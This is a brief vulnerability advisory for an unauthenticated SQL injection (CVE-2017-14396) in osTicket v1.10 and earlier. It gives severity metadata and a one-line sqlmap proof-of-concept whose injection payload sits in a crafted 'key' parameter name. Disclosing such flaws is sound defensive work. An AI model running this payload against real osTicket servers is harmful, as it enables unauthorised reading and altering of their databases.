1. ADVISORY INFORMATION ======================================== Title: osTicket v1.10 Unauthenticated SQL Injection Application: osTicket Bugs:SQL Injection Class: Sensitive Information disclosure Remotely Exploitable: Yes Authentication Required: NO Versions Affected: <= v1.10 Technology: PHP Vendor URL: http://osticket.com/ CVSSv3 Score: 10.0 (/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) Date of found: 12 Sep 2017 Author: Mehmet Ince Advisory: Advisory | osTicket v1.10 Unauthenticated SQL Injection (CVE-2017-14396 ) 2. CREDIT ======================================== This vulnerability was identified during penetration test by Mehmet INCE from PRODAFT / INVICTUS 3. VERSIONS AFFECTED ======================================== osTicket < 1.10 5. Technical Details & POC ======================================== Please visit an advisory URL for technical details. PoC code: python sqlmap.py -u " http://target/file.php?key[id%60%3D1*%23]=1&signature=1&expires=15104725311" --dbms MySQL 6. RISK ======================================== The vulnerability allows remote attackers to execute a sql query on database system. 7. REFERENCES ======================================== Advisory | osTicket v1.10 Unauthenticated SQL Injection (CVE-2017-14396 )
体验盒子
